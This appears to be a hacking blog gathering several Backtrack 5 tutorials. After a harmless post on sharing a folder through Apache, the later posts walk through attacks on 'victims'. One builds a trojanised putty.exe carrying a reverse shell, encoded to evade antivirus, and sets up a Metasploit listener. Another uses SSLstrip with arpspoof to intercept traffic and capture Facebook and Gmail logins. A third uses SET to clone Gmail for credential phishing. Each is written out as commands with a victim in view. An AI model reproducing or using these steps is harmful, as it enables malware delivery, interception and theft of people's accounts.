Monday, 27 February 2012

How to Share Folder in Backtrack 5 R1 to Make Accessible in Windows


1. Open your terminal (CTRL+ALT+T) and then run this command to create a new directory "share".

mkdir /var/www/share 

2. Change mode for the share folder into 755.

chmod -R 755 /var/www/share/ 

3. Change the ownership of that folder into www-data.

chown -R www-data:www-data /var/www/share/

5. Okay, everything we've set up correctly until this step. The next step is activate the apache server by running the service apache2 start command :

root@bt:~# service apache2 start 
* Starting web server apache2

if you didn't have apache2 installed, run
 apt-get install apache2 command

                                                              - - - - - VIDEO - - - - -


Guys plz comment and share and like .... thanks
Related post : 
Popular Posts : 

Monday, 9 January 2012

How to bypass internet security using metasploit (Video demonstration include)

How to bypass internet security using msfpayload and mafencode


  • I have posted so many articles on windows hacking using metasploit,using trojan etc,
  • Today i m go no show u hack windows using putty.
  • 1st u must encode putty for bypass antivirus using metasploit and than set payload in putty for connection to victim machine.
  • Now you send this encode putty file send to victim when victim open this tool than payload set connection between attacker machine to victim machine and encode is use for bypass antivirus so antivirus is not detect virus in putty.
  • You got meterpreter shell in your machine in metasploit so you do anythings in u r victim machine using meterpreter shell
  • You install trojan(netcat),u sniffing password (firefox,windows logon etc),u add new user account etc.


You might be interested in some of our other articles:
Requirement:




Steps:

Login to Backtrack machine

root@bt# cd /opt/framework/msf3/

root@bt:/opt/framework/msf3# mkdir work

copy putty.exe to above created work directory

root@bt:/opt/framework/msf3#mv /root/Desktop/putty.exe work/

root@bt:/opt/framework/msf3# msfpayload windows/shell_reverse_tcp LHOST=<your ip> LPORT=80 R | msfencode -t exe -x work/putty.exe -o /root/Desktop/puttyE.exe -e x86/shikata_ga_nai -k -c 5

wait

It will create puttyE.exe on root user desktop and give this puttyE.exe to victim.

After that start listener:

root@bt# msfconsole

msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp

msf exploit(handler) > set LHOST <your ip>

msf exploit(handler) > set LPORT 80

msf exploit(handler) > exploit

Now go to victim machine and open puttyE.exe

you will get access victim machine from backtrack 5 R1:

                                                     - - - - - Video demonstration - - - - -




Related Post :

Saturday, 24 December 2011

man in the middle attack using ssl strip


SSL STRIP

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements
 For SSL SLRIP(in BACKTRACK 5 )
  • Python >= 2.5 (apt-get install python)
  • The python "twisted-web" module (apt-get install python-twisted-web)

Setup

  • tar zxvf sslstrip-0.9.tar.gz
  • cd sslstrip-0.9
  • (optional) sudo python ./setup.py install

Man in the Middle Attack Using SSL STRIP

step 1 : open Terminal and type

echo "1" > /proc/sys/net/ipv4/ip_forward

this command use for Flip your machine into forwarding mode


step 2 : now u need Setup iptables to redirect HTTP traffic to sslstrip so this command use for it

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

in my case 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777

this command is use for all traffic on 80 port is redirect to port number 7777


step 3 : now time to run sslstrip

path - /pentest/web/sslstrip

./sslstrip.py -l <listenPort> -w <txt file name >

in my case

sslstrip.py -l 7777 -w mitm


-w command - write all date in one txt file 



step 4 :  Dont close this terminal , open new terminal and run arpspoof of sniff data from the victim PC in network


Run arpspoof to convince a network they should send their traffic to you


arpspoof -i <interface> -t <targetIP> <gatewayIP>

in my case 

arpspoof -i eth1 -t 192.168.1.102 192.168.1.1


IN VICTIM machine

IF u r blind successfull command than  u r victim pc ip table is changed by arpspoof

so u r sniff victim's data.

when victim access his/her gmail account

so his/her open gmail site but this gmail site is not real
but it is look like real site .
one one difference - real gamil site is HTTPS but this is HTTP .

When  ur victim enter his/her facebook Credential in this fake gmail website, arpspoof sniff this Credential and ssl strip is read this and write in txt file in u r /pentest/web/sslstrip.

in my case

txt file name - mitm.txt


You got ur victim facebook Credential..:D

                                                      - - - - - VIDEO TUTORIAL - - - - -

If you have any questions, Feel free to ask.
:D


Related post : 


Wednesday, 21 December 2011

Social Engineer Toolkit (SET)-Credential Harvester Attack(hack gmail,facebook,twitter account)


SET is a menu driven based attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; it requires multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the inability to fully customize it based on your target. Let’s dive into the menu and do a brief walkthrough of each attack vector.

Requirements

1. Bactrack 5

Social Engineer Toolkit (SET)-Credential Harvester Attack 

step 1 : 1st open terminal and go to this following path


cd  /pentext/exploit/set

and than enter

and type ./set for open  Social Engineer Toolkit

IT's look like






step 2 : Select option 1 : Social-Engineering Attacks from the set toolkit menu

now in set toolkit the new menu is open




step 3 : Select option 2 : Website Attack Vectors

The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide-variety of attacks that can occur once they click. We will dive into each one of the attacks later on.

now in set toolkit the new menu is open




step 4 : Select option 3 : Credential Harvester Attack Method

The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.

now in set toolkit the new menu is open




step 5 : Select option 2 : Site cloner

now in set toolkit the new menu is open


step 6 : Now u enter  ur target URL which u want clone ex. https://gmail.com

than enter.


Now
Credential Harvester is runing on port 80
A attacker PC is ready for attack .

now an URL you should give to your victim http://<u r ip address>/

in my case

  
http://192.168.1.103/


IN VICTIM PC

When u r victim enter this url http://192.168.1.103/ . web browser open gmail website but this is fake site made by SET toolkit..




When  ur victim enter his/her gmail Credential in this fake website , than fake website send Credential to attacker PC..








You got ur victim gmail Credential..:D

                                                      - - - - - VIDEO TUTORIAL - - - - -


If u want to learn How to use Credential Harvester Attack over the internet than click here(Youtube Video with HD print)

If you have any questions, Feel free to ask.
:D 


Related post :